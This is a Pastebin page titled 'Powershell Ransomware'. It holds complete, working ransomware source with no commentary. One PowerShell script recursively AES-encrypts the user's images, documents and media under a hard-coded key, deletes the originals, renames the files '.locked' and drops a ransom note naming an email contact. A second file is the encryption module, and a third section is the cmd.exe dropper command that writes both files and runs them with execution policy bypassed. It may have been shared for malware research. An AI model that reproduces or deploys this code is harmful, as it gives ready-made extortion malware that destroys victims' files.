API tools faq
paste
James_inthe_box

Powershell Ransomware

James_inthe_box
Jan 3rd, 2019
751
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.68 KB | None | 0 0
raw download clone embed print report
  1. cry.ps1:
  2. Import-Module Cipher $files = get-childitem $home -recurse -Include *.gif, *.jpg, *.xls, *.doc, *.pdf, *.wav, *.ppt, *.txt, *.png, *.bmp, *.mp3, *.mp4, *.avi | where {! $_.PSIsContainer} foreach ($file in $files) { Protect-File $file -Algorithm AES -KeyAsPlainText Zjc5OTA0MDQ2OWM1MjgyNjBhMTFjZGI3NDVlYmUzMDU= -Suffix '.locked' -RemoveSource } echo 'Your personal files have been encrypted, send an email to [email protected] to recover them. Your ID: d7b9-068a-8e17' > $home\Desktop\Readme_now.txt start $home\Desktop\Readme_now.txt Remove-Item -path $home\Documents\WindowsPowerShell\Modules\Cipher\*
  3.  
  4. Cipher.psm1:
  5. function New-CryptographyKey() {
  6. [CmdletBinding()]
  7. [OutputType([System.Security.SecureString])]
  8. [OutputType([String], ParameterSetName='PlainText')]
  9. Param([Parameter(Mandatory=$false, Position=1)]
  10. [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')]
  11. [String]$Algorithm='AES',
  12. [Parameter(Mandatory=$false, Position=2)]
  13. [Int]$KeySize,
  14. [Parameter(ParameterSetName='PlainText')]
  15. [Switch]$AsPlainText)
  16. Process {
  17. try {
  18. $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm)
  19. if($PSBoundParameters.ContainsKey('KeySize')){
  20. $Crypto.KeySize = $KeySize }
  21. $Crypto.GenerateKey()
  22. if($AsPlainText) {
  23. return [System.Convert]::ToBase64String($Crypto.Key) }
  24. else {
  25. return [System.Convert]::ToBase64String($Crypto.Key) | ConvertTo-SecureString -AsPlainText -Force } }
  26. catch { Write-Error $_ } } }
  27. Function Protect-File {
  28. [CmdletBinding(DefaultParameterSetName='SecureString')]
  29. [OutputType([System.IO.FileInfo[]])]
  30. Param([Parameter(Mandatory=$true, Position=1, ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)]
  31. [Alias('PSPath','LiteralPath')]
  32. [string[]]$FileName,
  33. [Parameter(Mandatory=$false, Position=2)]
  34. [ValidateSet('AES','DES','RC2','Rijndael','TripleDES')]
  35. [String]$Algorithm = 'AES',
  36. [Parameter(Mandatory=$false, Position=3, ParameterSetName='SecureString')]
  37. [System.Security.SecureString]$Key = (New-CryptographyKey -Algorithm $Algorithm),
  38. [Parameter(Mandatory=$true, Position=3, ParameterSetName='PlainText')]
  39. [String]$KeyAsPlainText,
  40. [Parameter(Mandatory=$false, Position=4)]
  41. [System.Security.Cryptography.CipherMode]$CipherMode,
  42. [Parameter(Mandatory=$false, Position=5)]
  43. [System.Security.Cryptography.PaddingMode]$PaddingMode,
  44. [Parameter(Mandatory=$false, Position=6)]
  45. [String]$Suffix = ".$Algorithm",
  46. [Parameter()]
  47. [Switch]$RemoveSource)
  48. Begin { try {
  49. if($PSCmdlet.ParameterSetName -eq 'PlainText') {
  50. $Key = $KeyAsPlainText | ConvertTo-SecureString -AsPlainText -Force}
  51. $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Key)
  52. $EncryptionKey = [System.Convert]::FromBase64String([System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR))
  53. $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm)
  54. if($PSBoundParameters.ContainsKey('CipherMode')){
  55. $Crypto.Mode = $CipherMode }
  56. if($PSBoundParameters.ContainsKey('PaddingMode')){
  57. $Crypto.Padding = $PaddingMode }
  58. $Crypto.KeySize = $EncryptionKey.Length*8
  59. $Crypto.Key = $EncryptionKey }
  60. Catch { Write-Error $_ -ErrorAction Stop } }
  61. Process {
  62. $Files = Get-Item -LiteralPath $FileName
  63. ForEach($File in $Files) { $DestinationFile = $File.FullName + $Suffix
  64. Try {
  65. $FileStreamReader = New-Object System.IO.FileStream($File.FullName, [System.IO.FileMode]::Open)
  66. $FileStreamWriter = New-Object System.IO.FileStream($DestinationFile, [System.IO.FileMode]::Create)
  67. $Crypto.GenerateIV()
  68. $FileStreamWriter.Write([System.BitConverter]::GetBytes($Crypto.IV.Length), 0, 4)
  69. $FileStreamWriter.Write($Crypto.IV, 0, $Crypto.IV.Length)
  70. $Transform = $Crypto.CreateEncryptor()
  71. $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write)
  72. $FileStreamReader.CopyTo($CryptoStream)
  73. $CryptoStream.FlushFinalBlock()
  74. $CryptoStream.Close()
  75. $FileStreamReader.Close()
  76. $FileStreamWriter.Close()
  77. if($RemoveSource){Remove-Item -LiteralPath $File.FullName}
  78. $result = Get-Item $DestinationFile
  79. $result | Add-Member -MemberType NoteProperty -Name SourceFile -Value $File.FullName
  80. $result | Add-Member -MemberType NoteProperty -Name Algorithm -Value $Algorithm
  81. $result | Add-Member -MemberType NoteProperty -Name Key -Value $Key
  82. $result | Add-Member -MemberType NoteProperty -Name CipherMode -Value $Crypto.Mode
  83. $result | Add-Member -MemberType NoteProperty -Name PaddingMode -Value $Crypto.Padding
  84. $result }
  85. Catch { Write-Error $_
  86. If($FileStreamWriter)
  87. { $FileStreamWriter.Close()
  88. Remove-Item -LiteralPath $DestinationFile -Force }
  89. Continue
  90. } Finally { if($CryptoStream){$CryptoStream.Close()}
  91. if($FileStreamReader){$FileStreamReader.Close()}
  92. if($FileStreamWriter){$FileStreamWriter.Close()} } } } }
  93.  
  94. embedded in exe:
  95. cmd.exe /c mkdir %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo function New-CryptographyKey() { > Cipher.psm1 & echo [CmdletBinding()] >> Cipher.psm1 & ech
  96. o [OutputType([System.Security.SecureString])] >> Cipher.psm1 & echo [OutputType([String], ParameterSetName='PlainText')] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$false, Position=1)] >> Cipher.psm1 & echo [ValidateSet('AES','DES','
  97. RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm='AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [Int]$KeySize, >> Cipher.psm1 & echo [Parameter(ParameterSetName=
  98. 'PlainText')] >> Cipher.psm1 & echo [Switch]$AsPlainText) >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo try { >> Cipher.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create
  99. ($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('KeySize')){ >> Cipher.psm1 & echo $Crypto.KeySize = $KeySize } >> Cipher.psm1 & echo $Crypto.GenerateKey() >> Cipher.psm1 &
  100. echo if($AsPlainText) { >> Cipher.psm1 & echo return [System.Convert]::ToBase64String($Crypto.Key) } >> Cipher.psm1 & echo else { >> Cipher.psm1 & echo return [System
  101. .Convert]::ToBase64String($Crypto.Key) ^| ConvertTo-SecureString -AsPlainText -Force } } >> Cipher.psm1 & echo catch { Write-Error $_ } } } >> Cipher.psm1 & echo Function Protect-File { >> Cip
  102. her.psm1 & echo [CmdletBinding(DefaultParameterSetName='SecureString')] >> Cipher.psm1 & echo [OutputType([System.IO.FileInfo[]])] >> Cipher.psm1 & echo Param([Parameter(Mandatory=$true, Position=1, ValueFromPipeline=$true, ValueFromPipelineByPr
  103. opertyName=$true)] >> Cipher.psm1 & echo [Alias('PSPath','LiteralPath')] >> Cipher.psm1 & echo [string[]]$FileName, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=2)] >> Cipher.psm1 & echo [ValidateSet('AES','DES'
  104. ,'RC2','Rijndael','TripleDES')] >> Cipher.psm1 & echo [String]$Algorithm = 'AES', >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=3, ParameterSetName='SecureString')] >> Cipher.psm1 & echo [System.Security.SecureString]$K
  105. ey = (New-CryptographyKey -Algorithm $Algorithm), >> Cipher.psm1 & echo [Parameter(Mandatory=$true, Position=3, ParameterSetName='PlainText')] >> Cipher.psm1 & echo [String]$KeyAsPlainText, >> Cipher.psm1 & echo [Parameter(Mandatory=
  106. $false, Position=4)] >> Cipher.psm1 & echo [System.Security.Cryptography.CipherMode]$CipherMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=5)] >> Cipher.psm1 & echo [System.Security.Cryptography.PaddingMode]$Paddin
  107. gMode, >> Cipher.psm1 & echo [Parameter(Mandatory=$false, Position=6)] >> Cipher.psm1 & echo [String]$Suffix = ".$Algorithm", >> Cipher.psm1 & echo [Parameter()] >> Cipher.psm1 & echo [Switch]$RemoveSource) >> Cipher.psm1 & echo
  108. Begin { try { >> Cipher.psm1 & echo if($PSCmdlet.ParameterSetName -eq 'PlainText') { >> Cipher.psm1 & echo $Key = $KeyAsPlainText ^| ConvertTo-SecureString -AsPlainText -Force} >> Cipher.psm1 & echo
  109. $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Key) >> Cipher.psm1 & echo $EncryptionKey = [System.Convert]::FromBase64String([System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)) >> Ciphe
  110. r.psm1 & echo $Crypto = [System.Security.Cryptography.SymmetricAlgorithm]::Create($Algorithm) >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('CipherMode')){ >> Cipher.psm1 & echo $Crypto.Mode = $
  111. CipherMode } >> Cipher.psm1 & echo if($PSBoundParameters.ContainsKey('PaddingMode')){ >> Cipher.psm1 & echo $Crypto.Padding = $PaddingMode } >> Cipher.psm1 & echo $Crypto.KeySize = $EncryptionKey.Length*8
  112. >> Cipher.psm1 & echo $Crypto.Key = $EncryptionKey } >> Cipher.psm1 & echo Catch { Write-Error $_ -ErrorAction Stop } } >> Cipher.psm1 & echo Process { >> Cipher.psm1 & echo $Files = Get-Item -Literal
  113. Path $FileName >> Cipher.psm1 & echo ForEach($File in $Files) { $DestinationFile = $File.FullName + $Suffix >> Cipher.psm1 & echo Try { >> Cipher.psm1 & echo $FileStreamReader = New-Object System
  114. .IO.FileStream($File.FullName, [System.IO.FileMode]::Open) >> Cipher.psm1 & echo $FileStreamWriter = New-Object System.IO.FileStream($DestinationFile, [System.IO.FileMode]::Create) >> Cipher.psm1 & echo $Crypto.Ge
  115. nerateIV() >> Cipher.psm1 & echo $FileStreamWriter.Write([System.BitConverter]::GetBytes($Crypto.IV.Length), 0, 4) >> Cipher.psm1 & echo $FileStreamWriter.Write($Crypto.IV, 0, $Crypto.IV.Length) >> Cipher.psm1 &
  116. echo $Transform = $Crypto.CreateEncryptor() >> Cipher.psm1 & echo $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]
  117. ::Write) >> Cipher.psm1 & echo $FileStreamReader.CopyTo($CryptoStream) >> Cipher.psm1 & echo $CryptoStream.FlushFinalBlock() >> Cipher.psm1 & echo $CryptoStream.Close() >> Cipher.psm1 & echo
  118. $FileStreamReader.Close() >> Cipher.psm1 & echo $FileStreamWriter.Close() >> Cipher.psm1 & echo if($RemoveSource){Remove-Item -LiteralPath $File.FullName} >> Cipher.psm1 & echo $result =
  119. Get-Item $DestinationFile >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name SourceFile -Value $File.FullName >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Algo
  120. rithm -Value $Algorithm >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name Key -Value $Key >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name CipherMode -Value $Cryp
  121. to.Mode >> Cipher.psm1 & echo $result ^| Add-Member -MemberType NoteProperty -Name PaddingMode -Value $Crypto.Padding >> Cipher.psm1 & echo $result } >> Cipher.psm1 & echo Catch { Write-E
  122. rror $_ >> Cipher.psm1 & echo If($FileStreamWriter) >> Cipher.psm1 & echo { $FileStreamWriter.Close() >> Cipher.psm1 & echo Remove-Item -LiteralPath $DestinationFile -Force } >> Cipher.psm1 &
  123. echo Continue >> Cipher.psm1 & echo } Finally { if($CryptoStream){$CryptoStream.Close()} >> Cipher.psm1 & echo if($FileStreamReader){$FileStreamReader.Close()} >> Cipher.psm1 & echo
  124. if($FileStreamWriter){$FileStreamWriter.Close()} } } } } >> Cipher.psm1 & echo Import-Module Cipher > cry.ps1 & echo $files = get-childitem $home -recurse -Include *.gif, *.jpg, *.xls, *.doc, *.pdf, *.wav, *.ppt, *.txt, *.png, *.bmp, *.m
  125. p3, *.mp4, *.avi ^| where {^! $_.PSIsContainer} >> cry.ps1 & echo foreach ($file in $files) { Protect-File $file -Algorithm AES -KeyAsPlainText Zjc5OTA0MDQ2OWM1MjgyNjBhMTFjZGI3NDVlYmUzMDU= -Suffix '.locked' -RemoveSource } >> cry.ps1 & echo ech
  126. o 'Your personal files have been encrypted, send an email to [email protected] to recover them. Your ID: d7b9-068a-8e17' ^> $home\Desktop\Readme_now.txt >> cry.ps1 & echo start $home\Desktop\Readme_now.txt >> cry.ps1 & exit
  127.  
  128. cmd.exe /c cd %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher & echo Remove-Item -path $home\Documents\WindowsPowerShell\Modules\Cipher\* >> %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & powershell -Execut
  129. ionPolicy ByPass -File %USERPROFILE%\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 & exit
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!